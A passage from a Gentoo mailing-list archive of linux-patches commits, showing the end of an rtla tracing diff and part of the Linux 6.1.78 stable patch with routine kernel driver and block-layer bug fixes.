++	bucket = latency / data->bucket_size;
+ 
+ 	if (!thread) {
+ 		hist = data->hist[cpu].irq;
+@@ -475,7 +474,11 @@ static void timerlat_hist_usage(char *usage)
+ 
+ 	for (i = 0; msg[i]; i++)
+ 		fprintf(stderr, "%s\n", msg[i]);
+-	exit(1);
++
++	if (usage)
++		exit(EXIT_FAILURE);
++
++	exit(EXIT_SUCCESS);
+ }
+ 
+ /*
+diff --git a/tools/tracing/rtla/src/timerlat_top.c b/tools/tracing/rtla/src/timerlat_top.c
+index 3342719352222..8fc0f6aa19dad 100644
+--- a/tools/tracing/rtla/src/timerlat_top.c
++++ b/tools/tracing/rtla/src/timerlat_top.c
+@@ -305,7 +305,11 @@ static void timerlat_top_usage(char *usage)
+ 
+ 	for (i = 0; msg[i]; i++)
+ 		fprintf(stderr, "%s\n", msg[i]);
+-	exit(1);
++
++	if (usage)
++		exit(EXIT_FAILURE);
++
++	exit(EXIT_SUCCESS);
+ }
+ 
+ /*
+diff --git a/tools/tracing/rtla/src/utils.c b/tools/tracing/rtla/src/utils.c
+index 663a047f794d2..8c8d63c7196cf 100644
+--- a/tools/tracing/rtla/src/utils.c
++++ b/tools/tracing/rtla/src/utils.c
+@@ -243,12 +243,6 @@ static inline int sched_setattr(pid_t pid, const struct sched_attr *attr,
+ 	return syscall(__NR_sched_setattr, pid, attr, flags);
+ }
+ 
+-static inline int sched_getattr(pid_t pid, struct sched_attr *attr,
+-				unsigned int size, unsigned int flags)
+-{
+-	return syscall(__NR_sched_getattr, pid, attr, size, flags);
+-}
+-
+ int __set_sched_attr(int pid, struct sched_attr *attr)
+ {
+ 	int flags = 0;
+@@ -484,13 +478,13 @@ int parse_prio(char *arg, struct sched_attr *sched_param)
+ 		if (prio == INVALID_VAL)
+ 			return -1;
+ 
+-		if (prio < sched_get_priority_min(SCHED_OTHER))
++		if (prio < MIN_NICE)
+ 			return -1;
+-		if (prio > sched_get_priority_max(SCHED_OTHER))
++		if (prio > MAX_NICE)
+ 			return -1;
+ 
+ 		sched_param->sched_policy   = SCHED_OTHER;
+-		sched_param->sched_priority = prio;
++		sched_param->sched_nice = prio;
+ 		break;
+ 	default:
+ 		return -1;
+diff --git a/tools/tracing/rtla/src/utils.h b/tools/tracing/rtla/src/utils.h
+index 5571afd3b5498..92da41aaf4c4c 100644
+--- a/tools/tracing/rtla/src/utils.h
++++ b/tools/tracing/rtla/src/utils.h
+@@ -7,6 +7,8 @@
+  */
+ #define BUFF_U64_STR_SIZE	24
+ #define MAX_PATH		1024
++#define MAX_NICE		20
++#define MIN_NICE		-19
+ 
+ #define container_of(ptr, type, member)({			\
+ 	const typeof(((type *)0)->member) *__mptr = (ptr);	\


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-02-16 19:00 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-02-16 19:00 UTC (permalink / raw
  To: gentoo-commits

commit:     09ae4eccbe9b346bb7300a09df69bfb5495388e5
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Feb 16 19:00:20 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Feb 16 19:00:20 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=09ae4ecc

Linux patch 6.1.78

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1077_linux-6.1.78.patch | 2252 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2256 insertions(+)

diff --git a/0000_README b/0000_README
index 264766b5..7d732a84 100644
--- a/0000_README
+++ b/0000_README
@@ -351,6 +351,10 @@ Patch:  1076_linux-6.1.77.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.77
 
+Patch:  1077_linux-6.1.78.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.78
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1077_linux-6.1.78.patch b/1077_linux-6.1.78.patch
new file mode 100644
index 00000000..d0f0c097
--- /dev/null
+++ b/1077_linux-6.1.78.patch
@@ -0,0 +1,2252 @@
+diff --git a/Makefile b/Makefile
+index f5598d90093f5..e93554269e474 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 77
++SUBLEVEL = 78
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/block/blk-core.c b/block/blk-core.c
+index 6eaf2b0ad7cca..aefdf07bdc2cf 100644
+--- a/block/blk-core.c
++++ b/block/blk-core.c
+@@ -864,7 +864,16 @@ int bio_poll(struct bio *bio, struct io_comp_batch *iob, unsigned int flags)
+ 	 */
+ 	blk_flush_plug(current->plug, false);
+ 
+-	if (bio_queue_enter(bio))
++	/*
++	 * We need to be able to enter a frozen queue, similar to how
++	 * timeouts also need to do that. If that is blocked, then we can
++	 * have pending IO when a queue freeze is started, and then the
++	 * wait for the freeze to finish will wait for polled requests to
++	 * timeout as the poller is preventer from entering the queue and
++	 * completing them. As long as we prevent new IO from being queued,
++	 * that should be all that matters.
++	 */
++	if (!percpu_ref_tryget(&q->q_usage_counter))
+ 		return 0;
+ 	if (queue_is_mq(q)) {
+ 		ret = blk_mq_poll(q, cookie, iob, flags);
+diff --git a/block/blk-iocost.c b/block/blk-iocost.c
+index 7dd6a33e1d6a8..e6557024e3da8 100644
+--- a/block/blk-iocost.c
++++ b/block/blk-iocost.c
+@@ -1337,6 +1337,13 @@ static bool iocg_kick_delay(struct ioc_gq *iocg, struct ioc_now *now)
+ 
+ 	lockdep_assert_held(&iocg->waitq.lock);
+ 
++	/*
++	 * If the delay is set by another CPU, we may be in the past. No need to
++	 * change anything if so. This avoids decay calculation underflow.
++	 */
++	if (time_before64(now->now, iocg->delay_at))
++		return false;
++
+ 	/* calculate the current delay in effect - 1/2 every second */
+ 	tdelta = now->now - iocg->delay_at;
+ 	if (iocg->delay)
+diff --git a/drivers/atm/idt77252.c b/drivers/atm/idt77252.c
+index 49cb4537344aa..2daf50d4cd47a 100644
+--- a/drivers/atm/idt77252.c
++++ b/drivers/atm/idt77252.c
+@@ -2930,6 +2930,8 @@ open_card_ubr0(struct idt77252_dev *card)
+ 	vc->scq = alloc_scq(card, vc->class);
+ 	if (!vc->scq) {
+ 		printk("%s: can't get SCQ.\n", card->name);
++		kfree(card->vcs[0]);
++		card->vcs[0] = NULL;
+ 		return -ENOMEM;
+ 	}
+ 
+diff --git a/drivers/dma/fsl-dpaa2-qdma/dpaa2-qdma.c b/drivers/dma/fsl-dpaa2-qdma/dpaa2-qdma.c
+index 8dd40d00a672a..6b829d347417a 100644
+--- a/drivers/dma/fsl-dpaa2-qdma/dpaa2-qdma.c
++++ b/drivers/dma/fsl-dpaa2-qdma/dpaa2-qdma.c
+@@ -38,15 +38,17 @@ static int dpaa2_qdma_alloc_chan_resources(struct dma_chan *chan)
+ 	if (!dpaa2_chan->fd_pool)
+ 		goto err;
+ 
+-	dpaa2_chan->fl_pool = dma_pool_create("fl_pool", dev,
+-					      sizeof(struct dpaa2_fl_entry),
+-					      sizeof(struct dpaa2_fl_entry), 0);
++	dpaa2_chan->fl_pool =
++		dma_pool_create("fl_pool", dev,
++				 sizeof(struct dpaa2_fl_entry) * 3,
++				 sizeof(struct dpaa2_fl_entry), 0);
++
+ 	if (!dpaa2_chan->fl_pool)
+ 		goto err_fd;
+ 
+ 	dpaa2_chan->sdd_pool =
+ 		dma_pool_create("sdd_pool", dev,
+-				sizeof(struct dpaa2_qdma_sd_d),
++				sizeof(struct dpaa2_qdma_sd_d) * 2,
+ 				sizeof(struct dpaa2_qdma_sd_d), 0);
+ 	if (!dpaa2_chan->sdd_pool)
+ 		goto err_fl;
+diff --git a/drivers/dma/fsl-qdma.c b/drivers/dma/fsl-qdma.c
+index 045ead46ec8fc..69385f32e2756 100644
+--- a/drivers/dma/fsl-qdma.c
++++ b/drivers/dma/fsl-qdma.c
+@@ -514,11 +514,11 @@ static struct fsl_qdma_queue
+ 			queue_temp = queue_head + i + (j * queue_num);
+ 
+ 			queue_temp->cq =
+-			dma_alloc_coherent(&pdev->dev,
+-					   sizeof(struct fsl_qdma_format) *
+-					   queue_size[i],
+-					   &queue_temp->bus_addr,
+-					   GFP_KERNEL);
++			dmam_alloc_coherent(&pdev->dev,
++					    sizeof(struct fsl_qdma_format) *
++					    queue_size[i],
++					    &queue_temp->bus_addr,
++					    GFP_KERNEL);
+ 			if (!queue_temp->cq)
+ 				return NULL;
+ 			queue_temp->block_base = fsl_qdma->block_base +
+@@ -563,11 +563,11 @@ static struct fsl_qdma_queue
+ 	/*
+ 	 * Buffer for queue command
+ 	 */
+-	status_head->cq = dma_alloc_coherent(&pdev->dev,
+-					     sizeof(struct fsl_qdma_format) *
+-					     status_size,
+-					     &status_head->bus_addr,
+-					     GFP_KERNEL);
++	status_head->cq = dmam_alloc_coherent(&pdev->dev,
++					      sizeof(struct fsl_qdma_format) *
++					      status_size,
++					      &status_head->bus_addr,
++					      GFP_KERNEL);
+ 	if (!status_head->cq) {
+ 		devm_kfree(&pdev->dev, status_head);
+ 		return NULL;
+@@ -1272,8 +1272,6 @@ static void fsl_qdma_cleanup_vchan(struct dma_device *dmadev)
+ 
+ static int fsl_qdma_remove(struct platform_device *pdev)
+ {
+-	int i;
+-	struct fsl_qdma_queue *status;
+ 	struct device_node *np = pdev->dev.of_node;
+ 	struct fsl_qdma_engine *fsl_qdma = platform_get_drvdata(pdev);
+ 
+@@ -1282,11 +1280,6 @@ static int fsl_qdma_remove(struct platform_device *pdev)
+ 	of_dma_controller_free(np);
+ 	dma_async_device_unregister(&fsl_qdma->dma_dev);
+ 
+-	for (i = 0; i < fsl_qdma->block_number; i++) {
+-		status = fsl_qdma->status[i];
+-		dma_free_coherent(&pdev->dev, sizeof(struct fsl_qdma_format) *
+-				status->n_cq, status->cq, status->bus_addr);
+-	}
+ 	return 0;
+ }
+ 
+diff --git a/drivers/dma/ti/k3-udma.c b/drivers/dma/ti/k3-udma.c
+index b86b809eb1f7e..82e7acfda6ed0 100644
+--- a/drivers/dma/ti/k3-udma.c
++++ b/drivers/dma/ti/k3-udma.c
+@@ -3963,6 +3963,7 @@ static void udma_desc_pre_callback(struct virt_dma_chan *vc,
+ {
+ 	struct udma_chan *uc = to_udma_chan(&vc->chan);
+ 	struct udma_desc *d;
++	u8 status;
+ 
+ 	if (!vd)
+ 		return;
+@@ -3972,12 +3973,12 @@ static void udma_desc_pre_callback(struct virt_dma_chan *vc,
+ 	if (d->metadata_size)
+ 		udma_fetch_epib(uc, d);
+ 
+-	/* Provide residue information for the client */
+ 	if (result) {
+ 		void *desc_vaddr = udma_curr_cppi5_desc_vaddr(d, d->desc_idx);
+ 
+ 		if (cppi5_desc_get_type(desc_vaddr) ==
+ 		    CPPI5_INFO0_DESC_TYPE_VAL_HOST) {
++			/* Provide residue information for the client */
+ 			result->residue = d->residue -
+ 					  cppi5_hdesc_get_pktlen(desc_vaddr);
+ 			if (result->residue)
+@@ -3986,7 +3987,12 @@ static void udma_desc_pre_callback(struct virt_dma_chan *vc,
+ 				result->result = DMA_TRANS_NOERROR;
+ 		} else {
+ 			result->residue = 0;
+-			result->result = DMA_TRANS_NOERROR;
++			/* Propagate TR Response errors to the client */
++			status = d->hwdesc[0].tr_resp_base->status;
++			if (status)
++				result->result = DMA_TRANS_ABORTED;
++			else
++				result->result = DMA_TRANS_NOERROR;
+ 		}
+ 	}
+ }
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn301/dcn301_resource.c b/drivers/gpu/drm/amd/display/dc/dcn301/dcn301_resource.c
+index f04595b750abc..5ec3f50a72acd 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn301/dcn301_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn301/dcn301_resource.c
+@@ -1014,7 +1014,7 @@ static struct stream_encoder *dcn301_stream_encoder_create(enum engine_id eng_id
+ 	vpg = dcn301_vpg_create(ctx, vpg_inst);
+ 	afmt = dcn301_afmt_create(ctx, afmt_inst);
+ 
+-	if (!enc1 || !vpg || !afmt) {
++	if (!enc1 || !vpg || !afmt || eng_id >= ARRAY_SIZE(stream_enc_regs)) {
+ 		kfree(enc1);
+ 		kfree(vpg);
+ 		kfree(afmt);
+diff --git a/drivers/gpu/drm/i915/gvt/handlers.c b/drivers/gpu/drm/i915/gvt/handlers.c
+index daac2050d77d0..6f531bb61f7e5 100644
+--- a/drivers/gpu/drm/i915/gvt/handlers.c
++++ b/drivers/gpu/drm/i915/gvt/handlers.c
+@@ -2844,8 +2844,7 @@ static int handle_mmio(struct intel_gvt_mmio_table_iter *iter, u32 offset,
+ 	for (i = start; i < end; i += 4) {
+ 		p = intel_gvt_find_mmio_info(gvt, i);
+ 		if (p) {
+-			WARN(1, "dup mmio definition offset %x\n",
+-				info->offset);
++			WARN(1, "dup mmio definition offset %x\n", i);
+ 
+ 			/* We return -EEXIST here to make GVT-g load fail.
+ 			 * So duplicated MMIO can be found as soon as
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+index 38d38f923df64..25245ef386db6 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+@@ -2053,7 +2053,7 @@ void dpu_encoder_helper_phys_cleanup(struct dpu_encoder_phys *phys_enc)
+ 	}
+ 
+ 	/* reset the merge 3D HW block */
+-	if (phys_enc->hw_pp->merge_3d) {
++	if (phys_enc->hw_pp && phys_enc->hw_pp->merge_3d) {
+ 		phys_enc->hw_pp->merge_3d->ops.setup_3d_mode(phys_enc->hw_pp->merge_3d,
+ 				BLEND_3D_NONE);
+ 		if (phys_enc->hw_ctl->ops.update_pending_flush_merge_3d)
+@@ -2069,7 +2069,7 @@ void dpu_encoder_helper_phys_cleanup(struct dpu_encoder_phys *phys_enc)
+ 	if (phys_enc->hw_wb)
+ 		intf_cfg.wb = phys_enc->hw_wb->idx;
+ 
+-	if (phys_enc->hw_pp->merge_3d)
++	if (phys_enc->hw_pp && phys_enc->hw_pp->merge_3d)
+ 		intf_cfg.merge_3d = phys_enc->hw_pp->merge_3d->idx;
+ 
+ 	if (ctl->ops.reset_intf_cfg)
+diff --git a/drivers/gpu/drm/msm/dp/dp_ctrl.c b/drivers/gpu/drm/msm/dp/dp_ctrl.c
+index 103eef9f059a0..b20701893e5b3 100644
+--- a/drivers/gpu/drm/msm/dp/dp_ctrl.c
++++ b/drivers/gpu/drm/msm/dp/dp_ctrl.c
+@@ -133,11 +133,6 @@ static void dp_ctrl_config_ctrl(struct dp_ctrl_private *ctrl)
+ 	tbd = dp_link_get_test_bits_depth(ctrl->link,
+ 			ctrl->panel->dp_mode.bpp);
+ 
+-	if (tbd == DP_TEST_BIT_DEPTH_UNKNOWN) {
+-		pr_debug("BIT_DEPTH not set. Configure default\n");
+-		tbd = DP_TEST_BIT_DEPTH_8;
+-	}
+-
+ 	config |= tbd << DP_CONFIGURATION_CTRL_BPC_SHIFT;
+ 
+ 	/* Num of Lanes */
+diff --git a/drivers/gpu/drm/msm/dp/dp_link.c b/drivers/gpu/drm/msm/dp/dp_link.c
+index cb66d1126ea96..ceb382fa56d5b 100644
+--- a/drivers/gpu/drm/msm/dp/dp_link.c
++++ b/drivers/gpu/drm/msm/dp/dp_link.c
+@@ -7,6 +7,7 @@
+ 
+ #include <drm/drm_print.h>
+ 
++#include "dp_reg.h"
+ #include "dp_link.h"
+ #include "dp_panel.h"
+ 
+@@ -1075,7 +1076,7 @@ int dp_link_process_request(struct dp_link *dp_link)
+ 
+ int dp_link_get_colorimetry_config(struct dp_link *dp_link)
+ {
+-	u32 cc;
++	u32 cc = DP_MISC0_COLORIMERY_CFG_LEGACY_RGB;
+ 	struct dp_link_private *link;
+ 
+ 	if (!dp_link) {
+@@ -1089,10 +1090,11 @@ int dp_link_get_colorimetry_config(struct dp_link *dp_link)
+ 	 * Unless a video pattern CTS test is ongoing, use RGB_VESA
+ 	 * Only RGB_VESA and RGB_CEA supported for now
+ 	 */
+-	if (dp_link_is_video_pattern_requested(link))
+-		cc = link->dp_link.test_video.test_dyn_range;
+-	else
+-		cc = DP_TEST_DYNAMIC_RANGE_VESA;
++	if (dp_link_is_video_pattern_requested(link)) {
++		if (link->dp_link.test_video.test_dyn_range &
++					DP_TEST_DYNAMIC_RANGE_CEA)
++			cc = DP_MISC0_COLORIMERY_CFG_CEA_RGB;
++	}
+ 
+ 	return cc;
+ }
+@@ -1172,6 +1174,9 @@ void dp_link_reset_phy_params_vx_px(struct dp_link *dp_link)
+ u32 dp_link_get_test_bits_depth(struct dp_link *dp_link, u32 bpp)
+ {
+ 	u32 tbd;
++	struct dp_link_private *link;
++
++	link = container_of(dp_link, struct dp_link_private, dp_link);
+ 
+ 	/*
+ 	 * Few simplistic rules and assumptions made here:
+@@ -1189,12 +1194,13 @@ u32 dp_link_get_test_bits_depth(struct dp_link *dp_link, u32 bpp)
+ 		tbd = DP_TEST_BIT_DEPTH_10;
+ 		break;
+ 	default:
+-		tbd = DP_TEST_BIT_DEPTH_UNKNOWN;
++		drm_dbg_dp(link->drm_dev, "bpp=%d not supported, use bpc=8\n",
++			   bpp);
++		tbd = DP_TEST_BIT_DEPTH_8;
+ 		break;
+ 	}
+ 
+-	if (tbd != DP_TEST_BIT_DEPTH_UNKNOWN)
+-		tbd = (tbd >> DP_TEST_BIT_DEPTH_SHIFT);
++	tbd = (tbd >> DP_TEST_BIT_DEPTH_SHIFT);
+ 
+ 	return tbd;
+ }
+diff --git a/drivers/gpu/drm/msm/dp/dp_reg.h b/drivers/gpu/drm/msm/dp/dp_reg.h
+index 268602803d9a3..176a503ece9c0 100644
+--- a/drivers/gpu/drm/msm/dp/dp_reg.h
++++ b/drivers/gpu/drm/msm/dp/dp_reg.h
+@@ -129,6 +129,9 @@
+ #define DP_MISC0_COLORIMETRY_CFG_SHIFT		(0x00000001)
+ #define DP_MISC0_TEST_BITS_DEPTH_SHIFT		(0x00000005)
+ 
++#define DP_MISC0_COLORIMERY_CFG_LEGACY_RGB	(0)
++#define DP_MISC0_COLORIMERY_CFG_CEA_RGB		(0x04)
++
+ #define REG_DP_VALID_BOUNDARY			(0x00000030)
+ #define REG_DP_VALID_BOUNDARY_2			(0x00000034)
+ 
+diff --git a/drivers/hwmon/aspeed-pwm-tacho.c b/drivers/hwmon/aspeed-pwm-tacho.c
+index d11f674e3dc37..51f321bcd778a 100644
+--- a/drivers/hwmon/aspeed-pwm-tacho.c
++++ b/drivers/hwmon/aspeed-pwm-tacho.c
+@@ -194,6 +194,8 @@ struct aspeed_pwm_tacho_data {
+ 	u8 fan_tach_ch_source[16];
+ 	struct aspeed_cooling_device *cdev[8];
+ 	const struct attribute_group *groups[3];
++	/* protects access to shared ASPEED_PTCR_RESULT */
++	struct mutex tach_lock;
+ };
+ 
+ enum type { TYPEM, TYPEN, TYPEO };
+@@ -528,6 +530,8 @@ static int aspeed_get_fan_tach_ch_rpm(struct aspeed_pwm_tacho_data *priv,
+ 	u8 fan_tach_ch_source, type, mode, both;
+ 	int ret;
+ 
++	mutex_lock(&priv->tach_lock);
++
+ 	regmap_write(priv->regmap, ASPEED_PTCR_TRIGGER, 0);
+ 	regmap_write(priv->regmap, ASPEED_PTCR_TRIGGER, 0x1 << fan_tach_ch);
+ 
+@@ -545,6 +549,8 @@ static int aspeed_get_fan_tach_ch_rpm(struct aspeed_pwm_tacho_data *priv,
+ 		ASPEED_RPM_STATUS_SLEEP_USEC,
+ 		usec);
+ 
++	mutex_unlock(&priv->tach_lock);
++
+ 	/* return -ETIMEDOUT if we didn't get an answer. */
+ 	if (ret)
+ 		return ret;
+@@ -904,6 +910,7 @@ static int aspeed_pwm_tacho_probe(struct platform_device *pdev)
+ 	priv = devm_kzalloc(dev, sizeof(*priv), GFP_KERNEL);
+ 	if (!priv)
+ 		return -ENOMEM;
++	mutex_init(&priv->tach_lock);
+ 	priv->regmap = devm_regmap_init(dev, NULL, (__force void *)regs,
+ 			&aspeed_pwm_tacho_regmap_config);
+ 	if (IS_ERR(priv->regmap))
+diff --git a/drivers/hwmon/coretemp.c b/drivers/hwmon/coretemp.c
+index 09aab5859fa75..59344ad62822d 100644
+--- a/drivers/hwmon/coretemp.c
++++ b/drivers/hwmon/coretemp.c
+@@ -380,7 +380,7 @@ static int get_tjmax(struct cpuinfo_x86 *c, u32 id, struct device *dev)
+ }
+ 
+ static int create_core_attrs(struct temp_data *tdata, struct device *dev,
+-			     int attr_no)
++			     int index)
+ {
+ 	int i;
+ 	static ssize_t (*const rd_ptr[TOTAL_ATTRS]) (struct device *dev,
+@@ -392,13 +392,20 @@ static int create_core_attrs(struct temp_data *tdata, struct device *dev,
+ 	};
+ 
+ 	for (i = 0; i < tdata->attr_size; i++) {
++		/*
++		 * We map the attr number to core id of the CPU
++		 * The attr number is always core id + 2
++		 * The Pkgtemp will always show up as temp1_*, if available
++		 */
++		int attr_no = tdata->is_pkg_data ? 1 : tdata->cpu_core_id + 2;
++
+ 		snprintf(tdata->attr_name[i], CORETEMP_NAME_LENGTH,
+ 			 "temp%d_%s", attr_no, suffixes[i]);
+ 		sysfs_attr_init(&tdata->sd_attrs[i].dev_attr.attr);
+ 		tdata->sd_attrs[i].dev_attr.attr.name = tdata->attr_name[i];
+ 		tdata->sd_attrs[i].dev_attr.attr.mode = 0444;
+ 		tdata->sd_attrs[i].dev_attr.show = rd_ptr[i];
+-		tdata->sd_attrs[i].index = attr_no;
++		tdata->sd_attrs[i].index = index;
+ 		tdata->attrs[i] = &tdata->sd_attrs[i].dev_attr.attr;
+ 	}
+ 	tdata->attr_group.attrs = tdata->attrs;
+@@ -456,27 +463,22 @@ static int create_core_data(struct platform_device *pdev, unsigned int cpu,
+ 	struct platform_data *pdata = platform_get_drvdata(pdev);
+ 	struct cpuinfo_x86 *c = &cpu_data(cpu);
+ 	u32 eax, edx;
+-	int err, index, attr_no;
++	int err, index;
+ 
+ 	/*
+-	 * Find attr number for sysfs:
+-	 * We map the attr number to core id of the CPU
+-	 * The attr number is always core id + 2
+-	 * The Pkgtemp will always show up as temp1_*, if available
++	 * Get the index of tdata in pdata->core_data[]
++	 * tdata for package: pdata->core_data[1]
++	 * tdata for core: pdata->core_data[2] .. pdata->core_data[NUM_REAL_CORES + 1]
+ 	 */
+ 	if (pkg_flag) {
+-		attr_no = PKG_SYSFS_ATTR_NO;
++		index = PKG_SYSFS_ATTR_NO;
+ 	} else {
+-		index = ida_alloc(&pdata->ida, GFP_KERNEL);
++		index = ida_alloc_max(&pdata->ida, NUM_REAL_CORES - 1, GFP_KERNEL);
+ 		if (index < 0)
+ 			return index;
+-		pdata->cpu_map[index] = topology_core_id(cpu);
+-		attr_no = index + BASE_SYSFS_ATTR_NO;
+-	}
+ 
+-	if (attr_no > MAX_CORE_DATA - 1) {
+-		err = -ERANGE;
+-		goto ida_free;
++		pdata->cpu_map[index] = topology_core_id(cpu);
++		index += BASE_SYSFS_ATTR_NO;
+ 	}
+ 
+ 	tdata = init_temp_data(cpu, pkg_flag);
+@@ -508,20 +510,20 @@ static int create_core_data(struct platform_device *pdev, unsigned int cpu,
+ 		}
+ 	}
+ 
+-	pdata->core_data[attr_no] = tdata;
++	pdata->core_data[index] = tdata;
+ 
+ 	/* Create sysfs interfaces */
+-	err = create_core_attrs(tdata, pdata->hwmon_dev, attr_no);
++	err = create_core_attrs(tdata, pdata->hwmon_dev, index);
+ 	if (err)
+ 		goto exit_free;
+ 
+ 	return 0;
+ exit_free:
+-	pdata->core_data[attr_no] = NULL;
++	pdata->core_data[index] = NULL;
+ 	kfree(tdata);
+ ida_free:
+ 	if (!pkg_flag)
+-		ida_free(&pdata->ida, index);
++		ida_free(&pdata->ida, index - BASE_SYSFS_ATTR_NO);
+ 	return err;
+ }
+ 
+diff --git a/drivers/infiniband/hw/irdma/verbs.c b/drivers/infiniband/hw/irdma/verbs.c
+index 447e1bcc82a32..4859b99d54fc2 100644
+--- a/drivers/infiniband/hw/irdma/verbs.c
++++ b/drivers/infiniband/hw/irdma/verbs.c
+@@ -2825,7 +2825,7 @@ static struct ib_mr *irdma_reg_user_mr(struct ib_pd *pd, u64 start, u64 len,
+ 	iwmr->ibmr.pd = pd;
+ 	iwmr->ibmr.device = pd->device;
+ 	iwmr->ibmr.iova = virt;
+-	iwmr->page_size = PAGE_SIZE;
++	iwmr->page_size = SZ_4K;
+ 
+ 	if (req.reg_type == IRDMA_MEMREG_TYPE_MEM) {
+ 		iwmr->page_size = ib_umem_find_best_pgsz(region,
+diff --git a/drivers/input/keyboard/atkbd.c b/drivers/input/keyboard/atkbd.c
+index c4d8caadec59e..661d6c8b059bf 100644
+--- a/drivers/input/keyboard/atkbd.c
++++ b/drivers/input/keyboard/atkbd.c
+@@ -792,7 +792,6 @@ static int atkbd_probe(struct atkbd *atkbd)
+ {
+ 	struct ps2dev *ps2dev = &atkbd->ps2dev;
+ 	unsigned char param[2];
+-	bool skip_getid;
+ 
+ /*
+  * Some systems, where the bit-twiddling when testing the io-lines of the
+@@ -806,6 +805,11 @@ static int atkbd_probe(struct atkbd *atkbd)
+ 				 "keyboard reset failed on %s\n",
+ 				 ps2dev->serio->phys);
+ 
++	if (atkbd_skip_getid(atkbd)) {
++		atkbd->id = 0xab83;
++		return 0;
++	}
++
+ /*
+  * Then we check the keyboard ID. We should get 0xab83 under normal conditions.
+  * Some keyboards report different values, but the first byte is always 0xab or
+@@ -814,18 +818,17 @@ static int atkbd_probe(struct atkbd *atkbd)
+  */
+ 
+ 	param[0] = param[1] = 0xa5;	/* initialize with invalid values */
+-	skip_getid = atkbd_skip_getid(atkbd);
+-	if (skip_getid || ps2_command(ps2dev, param, ATKBD_CMD_GETID)) {
++	if (ps2_command(ps2dev, param, ATKBD_CMD_GETID)) {
+ 
+ /*
+- * If the get ID command was skipped or failed, we check if we can at least set
++ * If the get ID command failed, we check if we can at least set
+  * the LEDs on the keyboard. This should work on every keyboard out there.
+  * It also turns the LEDs off, which we want anyway.
+  */
+ 		param[0] = 0;
+ 		if (ps2_command(ps2dev, param, ATKBD_CMD_SETLEDS))
+ 			return -1;
+-		atkbd->id = skip_getid ? 0xab83 : 0xabba;
++		atkbd->id = 0xabba;
+ 		return 0;
+ 	}
+ 
+diff --git a/drivers/input/serio/i8042-acpipnpio.h b/drivers/input/serio/i8042-acpipnpio.h
+index b585b1dab870e..cd45a65e17f2c 100644
+--- a/drivers/input/serio/i8042-acpipnpio.h
++++ b/drivers/input/serio/i8042-acpipnpio.h
+@@ -1208,6 +1208,12 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 					SERIO_QUIRK_RESET_ALWAYS | SERIO_QUIRK_NOLOOP |
+ 					SERIO_QUIRK_NOPNP)
+ 	},
++	{
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "NS5x_7xPU"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_NOAUX)
++	},
+ 	{
+ 		.matches = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "NJ50_70CU"),
+diff --git a/drivers/mtd/parsers/ofpart_core.c b/drivers/mtd/parsers/ofpart_core.c
+index 192190c42fc84..e7b8e9d0a9103 100644
+--- a/drivers/mtd/parsers/ofpart_core.c
++++ b/drivers/mtd/parsers/ofpart_core.c
+@@ -122,6 +122,25 @@ static int parse_fixed_partitions(struct mtd_info *master,
+ 
+ 		a_cells = of_n_addr_cells(pp);
+ 		s_cells = of_n_size_cells(pp);
++		if (!dedicated && s_cells == 0) {
++			/*
++			 * This is a ugly workaround to not create
++			 * regression on devices that are still creating
++			 * partitions as direct children of the nand controller.
++			 * This can happen in case the nand controller node has
++			 * #size-cells equal to 0 and the firmware (e.g.
++			 * U-Boot) just add the partitions there assuming
++			 * 32-bit addressing.
++			 *
++			 * If you get this warning your firmware and/or DTS
++			 * should be really fixed.
++			 *
++			 * This is working only for devices smaller than 4GiB.
++			 */
++			pr_warn("%s: ofpart partition %pOF (%pOF) #size-cells is wrongly set to <0>, assuming <1> for parsing partitions.\n",
++				master->name, pp, mtd_node);
++			s_cells = 1;
++		}
+ 		if (len / 4 != a_cells + s_cells) {
+ 			pr_debug("%s: ofpart partition %pOF (%pOF) error parsing reg property.\n",
+ 				 master->name, pp,
+diff --git a/drivers/net/ethernet/aquantia/atlantic/aq_ptp.c b/drivers/net/ethernet/aquantia/atlantic/aq_ptp.c
+index abd4832e4ed21..5acb3e16b5677 100644
+--- a/drivers/net/ethernet/aquantia/atlantic/aq_ptp.c
++++ b/drivers/net/ethernet/aquantia/atlantic/aq_ptp.c
+@@ -993,7 +993,7 @@ int aq_ptp_ring_alloc(struct aq_nic_s *aq_nic)
+ 	return 0;
+ 
+ err_exit_hwts_rx:
+-	aq_ring_free(&aq_ptp->hwts_rx);
++	aq_ring_hwts_rx_free(&aq_ptp->hwts_rx);
+ err_exit_ptp_rx:
+ 	aq_ring_free(&aq_ptp->ptp_rx);
+ err_exit_ptp_tx:
+@@ -1011,7 +1011,7 @@ void aq_ptp_ring_free(struct aq_nic_s *aq_nic)
+ 
+ 	aq_ring_free(&aq_ptp->ptp_tx);
+ 	aq_ring_free(&aq_ptp->ptp_rx);
+-	aq_ring_free(&aq_ptp->hwts_rx);
